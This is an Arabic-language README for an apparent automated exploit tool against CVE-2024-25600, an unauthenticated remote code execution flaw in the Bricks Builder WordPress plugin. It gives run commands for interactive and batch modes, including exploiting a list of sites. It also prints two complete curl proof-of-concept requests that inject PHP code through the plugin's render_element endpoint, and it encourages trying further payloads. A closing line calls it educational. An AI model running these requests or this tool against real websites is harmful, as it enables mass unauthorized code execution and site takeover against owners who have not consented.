
أداة استغلال آلية لثغرة CVE-2024-25600، تتيح تنفيذ الأوامر عن بُعد دون مصادقة على مواقع ووردبريس التي تستخدم إضافة Bricks Builder. تدعم الأوضاع التفاعلية والدفعية لتنفيذ الأوامر.
هذه الأداة 🛠️ مصممة لاستغلال الثغرة الأمنية CVE-2024-25600 🕳️ الموجودة في إضافة Bricks Builder الخاصة بووردبريس. تسمح الثغرة بتنفيذ أكواد عن بُعد دون مصادقة على المواقع المتأثرة 💻. تعمل الأداة على أتمتة عملية الاستغلال من خلال استرجاع الـ nonces وإرسال طلبات مصممة خصيصًا لتنفيذ أوامر اعتباطية.
git clone.pip install -r requirements.txt.python exploit.py -u <URL> لبدء الوضع التفاعلي.python exploit.py -l <file_path> لفحص واستغلال المواقع المدرجة.إن إثبات المفهوم الأساسي المقدم من الكشف هو كما يلي:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
تحديث: إثبات المفهوم الثاني (أكثر موثوقية)
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "carousel",
"settings": {
"type": "posts",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
من المحتمل أن تؤدي حمولات إضافية إلى نتائج أفضل. إذا لم يعمل استغلالي أو إثبات المفهوم معك، أشجعك على تجربة حمولات بديلة لإيجاد حل أكثر فعالية.
استبدل [HOST] بالموقع المستهدف و [NONCE] بقيمة الـ nonce المسترجعة من الموقع.
لمزيد من المعلومات حول الثغرة الأمنية CVE-2024-25600، يرجى الرجوع إلى الكشف المفصل على Snicco.io.
المعلومات الواردة في هذا README مخصصة للأغراض التعليمية فقط. الاختراق غير المصرح به للمواقع أو الشبكات غير قانوني وغير أخلاقي. 🚫
نشكر الباحثين الأمنيين الذين اكتشفوا وأبلغوا عن هذه الثغرة، وزودوا المجتمع بالمعلومات والأدوات التي تساعد في تأمين تطبيقات الويب الخاصة بهم.